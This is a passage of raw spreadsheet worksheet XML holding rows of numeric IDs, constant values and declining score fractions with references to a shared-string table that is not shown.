        <v>3.057561E7</v>
      </c>
      <c r="C8634" s="2" t="s">
        <v>8221</v>
      </c>
      <c r="D8634" s="2">
        <v>1.0</v>
      </c>
      <c r="E8634" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8634" s="2">
        <v>0.1229508196721312</v>
      </c>
    </row>
    <row r="8635" ht="15.75" customHeight="1">
      <c r="A8635" s="1">
        <v>17155.0</v>
      </c>
      <c r="B8635" s="2">
        <v>4.8856472E7</v>
      </c>
      <c r="C8635" s="2" t="s">
        <v>8222</v>
      </c>
      <c r="D8635" s="2">
        <v>1.0</v>
      </c>
      <c r="E8635" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8635" s="2">
        <v>0.1228482003129891</v>
      </c>
    </row>
    <row r="8636" ht="15.75" customHeight="1">
      <c r="A8636" s="1">
        <v>4101.0</v>
      </c>
      <c r="B8636" s="2">
        <v>4.1318597E7</v>
      </c>
      <c r="C8636" s="2" t="s">
        <v>8223</v>
      </c>
      <c r="D8636" s="2">
        <v>1.0</v>
      </c>
      <c r="E8636" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8636" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="8637" ht="15.75" customHeight="1">
      <c r="A8637" s="1">
        <v>14899.0</v>
      </c>
      <c r="B8637" s="2">
        <v>4.1149981E7</v>
      </c>
      <c r="C8637" s="2" t="s">
        <v>8224</v>
      </c>
      <c r="D8637" s="2">
        <v>1.0</v>
      </c>
      <c r="E8637" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8637" s="2">
        <v>0.1226415094339623</v>
      </c>
    </row>
    <row r="8638" ht="15.75" customHeight="1">
      <c r="A8638" s="1">
        <v>13211.0</v>
      </c>
      <c r="B8638" s="2">
        <v>3.4163685E7</v>
      </c>
      <c r="C8638" s="2" t="s">
        <v>8225</v>
      </c>
      <c r="D8638" s="2">
        <v>1.0</v>
      </c>
      <c r="E8638" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8638" s="2">
        <v>0.1225749559082893</v>
      </c>
    </row>
    <row r="8639" ht="15.75" customHeight="1">
      <c r="A8639" s="1">
        <v>3775.0</v>
      </c>
      <c r="B8639" s="2">
        <v>3.9878294E7</v>
      </c>
      <c r="C8639" s="2" t="s">
        <v>8226</v>
      </c>
      <c r="D8639" s="2">
        <v>1.0</v>
      </c>
      <c r="E8639" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8639" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="8640" ht="15.75" customHeight="1">
      <c r="A8640" s="1">
        <v>13948.0</v>
      </c>
      <c r="B8640" s="2">
        <v>3.7199616E7</v>
      </c>
      <c r="C8640" s="2" t="s">
        <v>8227</v>
      </c>
      <c r="D8640" s="2">
        <v>1.0</v>
      </c>
      <c r="E8640" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8640" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="8641" ht="15.75" customHeight="1">
      <c r="A8641" s="1">
        <v>19963.0</v>
      </c>
      <c r="B8641" s="2">
        <v>5.7546942E7</v>
      </c>
      <c r="C8641" s="2" t="s">
        <v>8228</v>
      </c>
      <c r="D8641" s="2">
        <v>1.0</v>
      </c>
      <c r="E8641" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8641" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="8642" ht="15.75" customHeight="1">
      <c r="A8642" s="1">
        <v>25144.0</v>
      </c>
      <c r="B8642" s="2">
        <v>1.3041886E7</v>
      </c>
      <c r="C8642" s="2" t="s">
        <v>8229</v>
      </c>
      <c r="D8642" s="2">
        <v>1.0</v>
      </c>
      <c r="E8642" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8642" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="8643" ht="15.75" customHeight="1">
      <c r="A8643" s="1">
        <v>14809.0</v>
      </c>
      <c r="B8643" s="2">
        <v>4.0924149E7</v>
      </c>
      <c r="C8643" s="2" t="s">
        <v>8230</v>
      </c>
      <c r="D8643" s="2">
        <v>1.0</v>
      </c>
      <c r="E8643" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8643" s="2">
        <v>0.1223958333333334</v>
      </c>
    </row>
    <row r="8644" ht="15.75" customHeight="1">
      <c r="A8644" s="1">
        <v>7768.0</v>
      </c>
      <c r="B8644" s="2">
        <v>5.2124217E7</v>
      </c>
      <c r="C8644" s="2" t="s">
        <v>8231</v>
      </c>
      <c r="D8644" s="2">
        <v>1.0</v>
      </c>
      <c r="E8644" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8644" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="8645" ht="15.75" customHeight="1">
      <c r="A8645" s="1">
        <v>11060.0</v>
      </c>
      <c r="B8645" s="2">
        <v>1.8251327E7</v>
      </c>
      <c r="C8645" s="2" t="s">
        <v>8232</v>
      </c>
      <c r="D8645" s="2">
        <v>1.0</v>
      </c>
      <c r="E8645" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8645" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="8646" ht="15.75" customHeight="1">
      <c r="A8646" s="1">
        <v>11347.0</v>
      </c>
      <c r="B8646" s="2">
        <v>2.1237237E7</v>
      </c>
      <c r="C8646" s="2" t="s">
        <v>8233</v>
      </c>
      <c r="D8646" s="2">
        <v>1.0</v>
      </c>
      <c r="E8646" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8646" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="8647" ht="15.75" customHeight="1">
      <c r="A8647" s="1">
        <v>12999.0</v>
      </c>
      <c r="B8647" s="2">
        <v>3.2802047E7</v>
      </c>
      <c r="C8647" s="2" t="s">
        <v>8234</v>
      </c>
      <c r="D8647" s="2">
        <v>1.0</v>
      </c>
      <c r="E8647" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8647" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="8648" ht="15.75" customHeight="1">
      <c r="A8648" s="1">
        <v>13955.0</v>
      </c>
      <c r="B8648" s="2">
        <v>3.7298203E7</v>
      </c>
      <c r="C8648" s="2" t="s">
        <v>8235</v>
      </c>
      <c r="D8648" s="2">
        <v>1.0</v>
      </c>
      <c r="E8648" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8648" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="8649" ht="15.75" customHeight="1">
      <c r="A8649" s="1">
        <v>16300.0</v>
      </c>
      <c r="B8649" s="2">
        <v>4.5901704E7</v>
      </c>
      <c r="C8649" s="2" t="s">
        <v>8236</v>
      </c>
      <c r="D8649" s="2">
        <v>1.0</v>
      </c>
      <c r="E8649" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8649" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="8650" ht="15.75" customHeight="1">
      <c r="A8650" s="1">
        <v>27727.0</v>
      </c>
      <c r="B8650" s="2">
        <v>2.3063083E7</v>
      </c>
      <c r="C8650" s="2" t="s">
        <v>8237</v>
      </c>
      <c r="D8650" s="2">
        <v>1.0</v>
      </c>
      <c r="E8650" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8650" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="8651" ht="15.75" customHeight="1">
      <c r="A8651" s="1">
        <v>2549.0</v>
      </c>
      <c r="B8651" s="2">
        <v>3.4130536E7</v>
      </c>
      <c r="C8651" s="2" t="s">
        <v>8238</v>
      </c>
      <c r="D8651" s="2">
        <v>1.0</v>
      </c>
      <c r="E8651" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8651" s="2">
        <v>0.1220538720538721</v>
      </c>
    </row>
    <row r="8652" ht="15.75" customHeight="1">
      <c r="A8652" s="1">
        <v>2496.0</v>
      </c>
      <c r="B8652" s="2">
        <v>3.3900501E7</v>
      </c>
      <c r="C8652" s="2" t="s">
        <v>8239</v>
      </c>
      <c r="D8652" s="2">
        <v>1.0</v>
      </c>
      <c r="E8652" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8652" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="8653" ht="15.75" customHeight="1">
      <c r="A8653" s="1">
        <v>2972.0</v>
      </c>
      <c r="B8653" s="2">
        <v>3.609391E7</v>
      </c>
      <c r="C8653" s="2" t="s">
        <v>8240</v>
      </c>
      <c r="D8653" s="2">
        <v>1.0</v>
      </c>
      <c r="E8653" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8653" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="8654" ht="15.75" customHeight="1">
      <c r="A8654" s="1">
        <v>5107.0</v>
      </c>
      <c r="B8654" s="2">
        <v>4.4528448E7</v>
      </c>
      <c r="C8654" s="2" t="s">
        <v>8241</v>
      </c>
      <c r="D8654" s="2">
        <v>1.0</v>
      </c>
      <c r="E8654" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8654" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="8655" ht="15.75" customHeight="1">
      <c r="A8655" s="1">
        <v>9804.0</v>
      </c>
      <c r="B8655" s="2">
        <v>5.656742E7</v>
      </c>
      <c r="C8655" s="2" t="s">
        <v>8242</v>
      </c>
      <c r="D8655" s="2">
        <v>1.0</v>
      </c>
      <c r="E8655" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8655" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="8656" ht="15.75" customHeight="1">
      <c r="A8656" s="1">
        <v>2317.0</v>
      </c>
      <c r="B8656" s="2">
        <v>3.286149E7</v>
      </c>
      <c r="C8656" s="2" t="s">
        <v>8243</v>
      </c>
      <c r="D8656" s="2">
        <v>1.0</v>
      </c>
      <c r="E8656" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8656" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="8657" ht="15.75" customHeight="1">
      <c r="A8657" s="1">
        <v>5593.0</v>
      </c>
      <c r="B8657" s="2">
        <v>4.6106989E7</v>
      </c>
      <c r="C8657" s="2" t="s">
        <v>8244</v>
      </c>
      <c r="D8657" s="2">
        <v>1.0</v>
      </c>
      <c r="E8657" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8657" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="8658" ht="15.75" customHeight="1">
      <c r="A8658" s="1">
        <v>6166.0</v>
      </c>
      <c r="B8658" s="2">
        <v>4.7876451E7</v>
      </c>
      <c r="C8658" s="2" t="s">
        <v>8245</v>
      </c>
      <c r="D8658" s="2">
        <v>1.0</v>
      </c>
      <c r="E8658" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8658" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="8659" ht="15.75" customHeight="1">
      <c r="A8659" s="1">
        <v>8023.0</v>
      </c>
      <c r="B8659" s="2">
        <v>5.2804441E7</v>
      </c>
      <c r="C8659" s="2" t="s">
        <v>8246</v>
      </c>
      <c r="D8659" s="2">
        <v>1.0</v>
      </c>
      <c r="E8659" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8659" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="8660" ht="15.75" customHeight="1">
      <c r="A8660" s="1">
        <v>20544.0</v>
      </c>
      <c r="B8660" s="2">
        <v>1.3379737E7</v>
      </c>
      <c r="C8660" s="2" t="s">
        <v>8247</v>
      </c>
      <c r="D8660" s="2">
        <v>1.0</v>
      </c>
      <c r="E8660" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8660" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="8661" ht="15.75" customHeight="1">
      <c r="A8661" s="1">
        <v>5521.0</v>
      </c>
      <c r="B8661" s="2">
        <v>4.5857867E7</v>
      </c>
      <c r="C8661" s="2" t="s">
        <v>8248</v>
      </c>
      <c r="D8661" s="2">
        <v>1.0</v>
      </c>
      <c r="E8661" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8661" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="8662" ht="15.75" customHeight="1">
      <c r="A8662" s="1">
        <v>14977.0</v>
      </c>
      <c r="B8662" s="2">
        <v>4.1376999E7</v>
      </c>
      <c r="C8662" s="2" t="s">
        <v>8249</v>
      </c>
      <c r="D8662" s="2">
        <v>1.0</v>
      </c>
      <c r="E8662" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8662" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="8663" ht="15.75" customHeight="1">
      <c r="A8663" s="1">
        <v>33145.0</v>
      </c>
      <c r="B8663" s="2">
        <v>7065764.0</v>
      </c>
      <c r="C8663" s="2" t="s">
        <v>8250</v>
      </c>
      <c r="D8663" s="2">
        <v>1.0</v>
      </c>
      <c r="E8663" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8663" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="8664" ht="15.75" customHeight="1">
      <c r="A8664" s="1">
        <v>4739.0</v>
      </c>
      <c r="B8664" s="2">
        <v>4.3354086E7</v>
      </c>
      <c r="C8664" s="2" t="s">
        <v>8251</v>
      </c>
      <c r="D8664" s="2">
        <v>1.0</v>
      </c>
      <c r="E8664" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8664" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="8665" ht="15.75" customHeight="1">
      <c r="A8665" s="1">
        <v>10794.0</v>
      </c>
      <c r="B8665" s="2">
        <v>1.5731994E7</v>
      </c>
      <c r="C8665" s="2" t="s">
        <v>8252</v>
      </c>
      <c r="D8665" s="2">
        <v>1.0</v>
      </c>
      <c r="E8665" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8665" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="8666" ht="15.75" customHeight="1">
      <c r="A8666" s="1">
        <v>14099.0</v>
      </c>
      <c r="B8666" s="2">
        <v>3.774867E7</v>
      </c>
      <c r="C8666" s="2" t="s">
        <v>8253</v>
      </c>
      <c r="D8666" s="2">
        <v>1.0</v>
      </c>
      <c r="E8666" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8666" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="8667" ht="15.75" customHeight="1">
      <c r="A8667" s="1">
        <v>18332.0</v>
      </c>
      <c r="B8667" s="2">
        <v>5.2412235E7</v>
      </c>
      <c r="C8667" s="2" t="s">
        <v>8254</v>
      </c>
      <c r="D8667" s="2">
        <v>1.0</v>
      </c>
      <c r="E8667" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8667" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="8668" ht="15.75" customHeight="1">
      <c r="A8668" s="1">
        <v>22677.0</v>
      </c>
      <c r="B8668" s="2">
        <v>4.1777335E7</v>
      </c>
      <c r="C8668" s="2" t="s">
        <v>8255</v>
      </c>
      <c r="D8668" s="2">
        <v>1.0</v>
      </c>
      <c r="E8668" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8668" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="8669" ht="15.75" customHeight="1">
      <c r="A8669" s="1">
        <v>25339.0</v>
      </c>
      <c r="B8669" s="2">
        <v>1.3523898E7</v>
      </c>
      <c r="C8669" s="2" t="s">
        <v>8256</v>
      </c>
      <c r="D8669" s="2">
        <v>1.0</v>
      </c>
      <c r="E8669" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8669" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="8670" ht="15.75" customHeight="1">
      <c r="A8670" s="1">
        <v>14164.0</v>
      </c>
      <c r="B8670" s="2">
        <v>3.8027784E7</v>
      </c>
      <c r="C8670" s="2" t="s">
        <v>8257</v>
      </c>
      <c r="D8670" s="2">
        <v>1.0</v>
      </c>
      <c r="E8670" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8670" s="2">
        <v>0.1215780998389694</v>
      </c>
    </row>
    <row r="8671" ht="15.75" customHeight="1">
      <c r="A8671" s="1">
        <v>305.0</v>
      </c>
      <c r="B8671" s="2">
        <v>1.557729E7</v>
      </c>
      <c r="C8671" s="2" t="s">
        <v>8258</v>
      </c>
      <c r="D8671" s="2">
        <v>1.0</v>
      </c>
      <c r="E8671" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8671" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8672" ht="15.75" customHeight="1">
      <c r="A8672" s="1">
        <v>669.0</v>
      </c>
      <c r="B8672" s="2">
        <v>2.024467E7</v>
      </c>
      <c r="C8672" s="2" t="s">
        <v>8259</v>
      </c>
      <c r="D8672" s="2">
        <v>1.0</v>
      </c>
      <c r="E8672" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8672" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8673" ht="15.75" customHeight="1">
      <c r="A8673" s="1">
        <v>718.0</v>
      </c>
      <c r="B8673" s="2">
        <v>2.0650604E7</v>
      </c>
      <c r="C8673" s="2" t="s">
        <v>8260</v>
      </c>
      <c r="D8673" s="2">
        <v>1.0</v>
      </c>
      <c r="E8673" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8673" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8674" ht="15.75" customHeight="1">
      <c r="A8674" s="1">
        <v>1315.0</v>
      </c>
      <c r="B8674" s="2">
        <v>2.5706431E7</v>
      </c>
      <c r="C8674" s="2" t="s">
        <v>8261</v>
      </c>
      <c r="D8674" s="2">
        <v>1.0</v>
      </c>
      <c r="E8674" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8674" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8675" ht="15.75" customHeight="1">
      <c r="A8675" s="1">
        <v>1855.0</v>
      </c>
      <c r="B8675" s="2">
        <v>2.9493043E7</v>
      </c>
      <c r="C8675" s="2" t="s">
        <v>8262</v>
      </c>
      <c r="D8675" s="2">
        <v>1.0</v>
      </c>
      <c r="E8675" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8675" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8676" ht="15.75" customHeight="1">
      <c r="A8676" s="1">
        <v>3158.0</v>
      </c>
      <c r="B8676" s="2">
        <v>3.7003667E7</v>
      </c>
      <c r="C8676" s="2" t="s">
        <v>8263</v>
      </c>
      <c r="D8676" s="2">
        <v>1.0</v>
      </c>
      <c r="E8676" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8676" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8677" ht="15.75" customHeight="1">
      <c r="A8677" s="1">
        <v>4300.0</v>
      </c>
      <c r="B8677" s="2">
        <v>4.1948374E7</v>
      </c>
      <c r="C8677" s="2" t="s">
        <v>8264</v>
      </c>
      <c r="D8677" s="2">
        <v>1.0</v>
      </c>
      <c r="E8677" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8677" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8678" ht="15.75" customHeight="1">
      <c r="A8678" s="1">
        <v>4532.0</v>
      </c>
      <c r="B8678" s="2">
        <v>4.2643886E7</v>
      </c>
      <c r="C8678" s="2" t="s">
        <v>8265</v>
      </c>
      <c r="D8678" s="2">
        <v>1.0</v>
      </c>
      <c r="E8678" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8678" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8679" ht="15.75" customHeight="1">
      <c r="A8679" s="1">
        <v>6709.0</v>
      </c>
      <c r="B8679" s="2">
        <v>4.9242729E7</v>
      </c>
      <c r="C8679" s="2" t="s">
        <v>8266</v>
      </c>
      <c r="D8679" s="2">
        <v>1.0</v>
      </c>
      <c r="E8679" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8679" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8680" ht="15.75" customHeight="1">
      <c r="A8680" s="1">
        <v>7728.0</v>
      </c>
      <c r="B8680" s="2">
        <v>5.2034556E7</v>
      </c>
      <c r="C8680" s="2" t="s">
        <v>8267</v>
      </c>
      <c r="D8680" s="2">
        <v>1.0</v>
      </c>
      <c r="E8680" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8680" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8681" ht="15.75" customHeight="1">
      <c r="A8681" s="1">
        <v>8647.0</v>
      </c>
      <c r="B8681" s="2">
        <v>5.434896E7</v>
      </c>
      <c r="C8681" s="2" t="s">
        <v>8268</v>
      </c>
      <c r="D8681" s="2">
        <v>1.0</v>
      </c>
      <c r="E8681" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8681" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8682" ht="15.75" customHeight="1">
      <c r="A8682" s="1">
        <v>9000.0</v>
      </c>
      <c r="B8682" s="2">
        <v>5.4969143E7</v>
      </c>
      <c r="C8682" s="2" t="s">
        <v>8269</v>
      </c>
      <c r="D8682" s="2">
        <v>1.0</v>
      </c>
      <c r="E8682" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8682" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8683" ht="15.75" customHeight="1">
      <c r="A8683" s="1">
        <v>9001.0</v>
      </c>
      <c r="B8683" s="2">
        <v>5.4969143E7</v>
      </c>
      <c r="C8683" s="2" t="s">
        <v>8270</v>
      </c>
      <c r="D8683" s="2">
        <v>1.0</v>
      </c>
      <c r="E8683" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8683" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8684" ht="15.75" customHeight="1">
      <c r="A8684" s="1">
        <v>10590.0</v>
      </c>
      <c r="B8684" s="2">
        <v>1.3370264E7</v>
      </c>
      <c r="C8684" s="2" t="s">
        <v>8271</v>
      </c>
      <c r="D8684" s="2">
        <v>1.0</v>
      </c>
      <c r="E8684" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8684" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8685" ht="15.75" customHeight="1">
      <c r="A8685" s="1">
        <v>12103.0</v>
      </c>
      <c r="B8685" s="2">
        <v>2.6769567E7</v>
      </c>
      <c r="C8685" s="2" t="s">
        <v>8272</v>
      </c>
      <c r="D8685" s="2">
        <v>1.0</v>
      </c>
      <c r="E8685" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8685" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8686" ht="15.75" customHeight="1">
      <c r="A8686" s="1">
        <v>12147.0</v>
      </c>
      <c r="B8686" s="2">
        <v>2.7238844E7</v>
      </c>
      <c r="C8686" s="2" t="s">
        <v>8273</v>
      </c>
      <c r="D8686" s="2">
        <v>1.0</v>
      </c>
      <c r="E8686" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8686" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8687" ht="15.75" customHeight="1">
      <c r="A8687" s="1">
        <v>12163.0</v>
      </c>
      <c r="B8687" s="2">
        <v>2.7353029E7</v>
      </c>
      <c r="C8687" s="2" t="s">
        <v>8274</v>
      </c>
      <c r="D8687" s="2">
        <v>1.0</v>
      </c>
      <c r="E8687" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8687" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8688" ht="15.75" customHeight="1">
      <c r="A8688" s="1">
        <v>12255.0</v>
      </c>
      <c r="B8688" s="2">
        <v>2.7980312E7</v>
      </c>
      <c r="C8688" s="2" t="s">
        <v>8275</v>
      </c>
      <c r="D8688" s="2">
        <v>1.0</v>
      </c>
      <c r="E8688" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8688" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8689" ht="15.75" customHeight="1">
      <c r="A8689" s="1">
        <v>12511.0</v>
      </c>
      <c r="B8689" s="2">
        <v>2.96414E7</v>
      </c>
      <c r="C8689" s="2" t="s">
        <v>8276</v>
      </c>
      <c r="D8689" s="2">
        <v>1.0</v>
      </c>
      <c r="E8689" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8689" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8690" ht="15.75" customHeight="1">
      <c r="A8690" s="1">
        <v>12557.0</v>
      </c>
      <c r="B8690" s="2">
        <v>2.9901664E7</v>
      </c>
      <c r="C8690" s="2" t="s">
        <v>8277</v>
      </c>
      <c r="D8690" s="2">
        <v>1.0</v>
      </c>
      <c r="E8690" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8690" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8691" ht="15.75" customHeight="1">
      <c r="A8691" s="1">
        <v>13237.0</v>
      </c>
      <c r="B8691" s="2">
        <v>3.4254441E7</v>
      </c>
      <c r="C8691" s="2" t="s">
        <v>8278</v>
      </c>
      <c r="D8691" s="2">
        <v>1.0</v>
      </c>
      <c r="E8691" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8691" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8692" ht="15.75" customHeight="1">
      <c r="A8692" s="1">
        <v>13516.0</v>
      </c>
      <c r="B8692" s="2">
        <v>3.5483859E7</v>
      </c>
      <c r="C8692" s="2" t="s">
        <v>8279</v>
      </c>
      <c r="D8692" s="2">
        <v>1.0</v>
      </c>
      <c r="E8692" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8692" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8693" ht="15.75" customHeight="1">
      <c r="A8693" s="1">
        <v>13525.0</v>
      </c>
      <c r="B8693" s="2">
        <v>3.5514139E7</v>
      </c>
      <c r="C8693" s="2" t="s">
        <v>8280</v>
      </c>
      <c r="D8693" s="2">
        <v>1.0</v>
      </c>
      <c r="E8693" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8693" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8694" ht="15.75" customHeight="1">
      <c r="A8694" s="1">
        <v>14239.0</v>
      </c>
      <c r="B8694" s="2">
        <v>3.83099E7</v>
      </c>
      <c r="C8694" s="2" t="s">
        <v>8281</v>
      </c>
      <c r="D8694" s="2">
        <v>1.0</v>
      </c>
      <c r="E8694" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8694" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8695" ht="15.75" customHeight="1">
      <c r="A8695" s="1">
        <v>14732.0</v>
      </c>
      <c r="B8695" s="2">
        <v>4.0679546E7</v>
      </c>
      <c r="C8695" s="2" t="s">
        <v>8282</v>
      </c>
      <c r="D8695" s="2">
        <v>1.0</v>
      </c>
      <c r="E8695" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8695" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8696" ht="15.75" customHeight="1">
      <c r="A8696" s="1">
        <v>14851.0</v>
      </c>
      <c r="B8696" s="2">
        <v>4.1061854E7</v>
      </c>
      <c r="C8696" s="2" t="s">
        <v>8283</v>
      </c>
      <c r="D8696" s="2">
        <v>1.0</v>
      </c>
      <c r="E8696" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8696" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8697" ht="15.75" customHeight="1">
      <c r="A8697" s="1">
        <v>18629.0</v>
      </c>
      <c r="B8697" s="2">
        <v>5.3380198E7</v>
      </c>
      <c r="C8697" s="2" t="s">
        <v>8284</v>
      </c>
      <c r="D8697" s="2">
        <v>1.0</v>
      </c>
      <c r="E8697" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8697" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8698" ht="15.75" customHeight="1">
      <c r="A8698" s="1">
        <v>18980.0</v>
      </c>
      <c r="B8698" s="2">
        <v>5.4385597E7</v>
      </c>
      <c r="C8698" s="2" t="s">
        <v>8285</v>
      </c>
      <c r="D8698" s="2">
        <v>1.0</v>
      </c>
      <c r="E8698" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8698" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8699" ht="15.75" customHeight="1">
      <c r="A8699" s="1">
        <v>20936.0</v>
      </c>
      <c r="B8699" s="2">
        <v>1.6462649E7</v>
      </c>
      <c r="C8699" s="2" t="s">
        <v>8286</v>
      </c>
      <c r="D8699" s="2">
        <v>1.0</v>
      </c>
      <c r="E8699" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8699" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8700" ht="15.75" customHeight="1">
      <c r="A8700" s="1">
        <v>21605.0</v>
      </c>
      <c r="B8700" s="2">
        <v>2.4335314E7</v>
      </c>
      <c r="C8700" s="2" t="s">
        <v>8287</v>
      </c>
      <c r="D8700" s="2">
        <v>1.0</v>
      </c>
      <c r="E8700" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8700" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8701" ht="15.75" customHeight="1">
      <c r="A8701" s="1">
        <v>22632.0</v>
      </c>
      <c r="B8701" s="2">
        <v>4.054634E7</v>
